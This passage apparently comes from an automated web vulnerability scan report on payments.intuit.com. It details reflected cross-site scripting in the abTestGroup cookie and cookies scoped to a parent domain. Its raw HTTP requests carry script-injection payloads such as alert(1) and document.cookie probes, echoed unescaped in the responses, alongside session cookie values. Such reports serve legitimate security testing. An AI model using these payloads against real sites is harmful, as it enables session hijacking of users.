The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2219"><script>alert(1)</script>d85e888e13e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d2219"><script>alert(1)</script>d85e888e13e;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=T1u1XH4DfrzerP928diaQw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E07850A0805192AA117E3B164A0FB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116404


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16d2219"><script>alert(1)</script>d85e888e13e" type="hidden" />
...[SNIP]...

1.119. http://payments.intuit.com/support/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79ad"><script>alert(1)</script>e8785a94aac was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16c79ad"><script>alert(1)</script>e8785a94aac;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=i8iNytoY1Ui6tDFoAVhOcw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AFFB20A0805192AA117E35F81E813
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98215


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16c79ad"><script>alert(1)</script>e8785a94aac" type="hidden" />
...[SNIP]...

1.120. http://payments.intuit.com/support/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 77a3a<script>alert(1)</script>eb661626a4c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1677a3a<script>alert(1)</script>eb661626a4c;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+fYnnrFufW+udQMJRBi-CA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C80060A0805192AA117E36100617F
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 98200


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T1677a3a<script>alert(1)</script>eb661626a4c<br />
...[SNIP]...

1.121. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b0496<script>alert(1)</script>bc940e2dae4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0496<script>alert(1)</script>bc940e2dae4;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=V3muyf7UBAI0P+tkQ9nfKQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3E7D0A0805192AA117E3D2CDCAC4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140109


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16b0496<script>alert(1)</script>bc940e2dae4<br />
...[SNIP]...

1.122. http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /support/glossary.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb67a"><script>alert(1)</script>411f1d9182d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16bb67a"><script>alert(1)</script>411f1d9182d;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:46 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=RRotOArxmPQIpIZcrWSlYg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:47 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC1E70A0805192AA117E30C0FAA74
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=glossary_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140123


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16bb67a"><script>alert(1)</script>411f1d9182d" type="hidden" />
...[SNIP]...

2. Cookie scoped to parent domain  previous  next
There are 30 instances of this issue:


2.1. http://payments.intuit.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:51:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=qAxsrp9PR61Zkfu7bywdhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:28:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95481DD0A0805192AA117E3AC0B20D5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108297


                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.2. http://payments.intuit.com/apply-now/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:43 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=8ip-v84y9ZWl4HV7CywZHA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:44 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95621C90A0805192AA117E322A75078
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128230


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.3. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:34 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=o3tbY+dzKlKjxj5+PKCbTQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:35 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955FB530A0805192AA117E379B3E1C0
